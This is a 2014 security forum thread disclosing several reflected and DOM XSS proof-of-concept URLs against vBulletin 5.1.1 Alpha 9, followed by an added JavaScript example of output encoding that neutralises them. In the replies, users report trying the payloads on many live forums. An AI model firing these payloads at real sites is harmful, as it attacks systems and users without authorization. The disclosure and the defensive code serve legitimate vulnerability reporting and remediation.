Nytro, posted April 18, 2014

Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities
Authors: Romanian Security Team
Website: https://rstforums.com/forum/
Date published: 19 April 2014
Software: vBulletin
Version: 5.1.1 Alpha 9

[XSS] Random topic
- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//

[XSS] New private message
- https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>

[XSS] View PM: you must know or bruteforce private message ID (830372)
- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//

[DOM XSS] Help
- https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>

(c) Romanian Security Team 2014

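Added example (not part of the original post and not vBulletin code): the output handling that neutralizes the three payload shapes listed in the advisory above. It assumes, from the shape of the payloads, that `view` and `folderid` are reflected inside a double-quoted JavaScript string, that the private-message path segment is reflected inside a double-quoted HTML attribute, and that the help page uses the URL fragment to select an element; all function names are hypothetical.

```javascript
// Added example, not vBulletin code. Sample inputs are the strings quoted
// in the post above; where each one is reflected is an assumption.

// For a value written inside a quoted JavaScript string literal in an inline
// <script>: every non-alphanumeric UTF-16 unit becomes \uXXXX, so the value
// cannot close the string, end the statement or emit "</script>".
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

// For a value written inside a quoted HTML attribute: the characters that
// can close the attribute or open a new tag become character references.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeForHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// For a location.hash used to pick an element on the page (hypothetical use):
// accept only a plain identifier and return null otherwise, so the fragment is
// never concatenated into markup or a selector string.
function safeAnchorId(hash) {
  const id = String(hash).replace(/^#/, "");
  return /^[A-Za-z][A-Za-z0-9_-]{0,63}$/.test(id) ? id : null;
}

// Inputs taken from the advisory text above.
const viewParam = 'stream1337";alert(123);//';
const pmRecipient = '9999"><input onfocus=alert(1) autofocus>';
const helpHash = "#'\"><img src=x onerror=prompt(\"PoC\")>";

// What a template would emit after encoding: the values stay data.
console.log('var view = "' + encodeForJsString(viewParam) + '";');
console.log('<input name="to" value="' + encodeForHtmlAttr(pmRecipient) + '">');
console.log(safeAnchorId(helpHash), safeAnchorId("#faq-3"));
```
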
.Breacker, posted April 19, 2014

It works, I tested it on a forum.

Nytro (author), posted April 19, 2014

Packetstorm: vBulletin 5.1 Cross Site Scripting ≈ Packet Storm

TheGeneral, posted April 19, 2014

I tested it on 7 forums and it doesn't work.

sensi, posted April 19, 2014 (edited April 19, 2014)

Congratulations, guys! +1 for RST. Sad that only the crap topics get 100 pages and 145.656.32543,21 replies...

// Are you sure you tested on vBulletin version 5.1?

TheGeneral, posted April 19, 2014

Only on 4.2.0 and 4.2.2 .... What a rookie mistake I made.

Castiel, posted April 19, 2014

I tested it on a "nulled" version, it works! +1 RST. This community keeps getting bigger.

BadPorn, posted April 20, 2014

It doesn't matter how many hacking communities pop up overnight! There is only one RST! Bravo!

Aerosol, posted April 21, 2014

Very good. Tested on many forums!

Nytro (author), posted April 22, 2014

SecurityFocus: vBulletin Multiple Cross Site Scripting Vulnerabilities
IBM ISS: ISS X-Force Database: vbulletin-multiple-scripts-xss(92664): vBulletin multiple scripts cross-site scripting
SCIP: vBulletin up to 5.1.1 Alpha 9 cross site scripting

The bums at exploit-db still haven't added it. Someone let them know that Easter is over.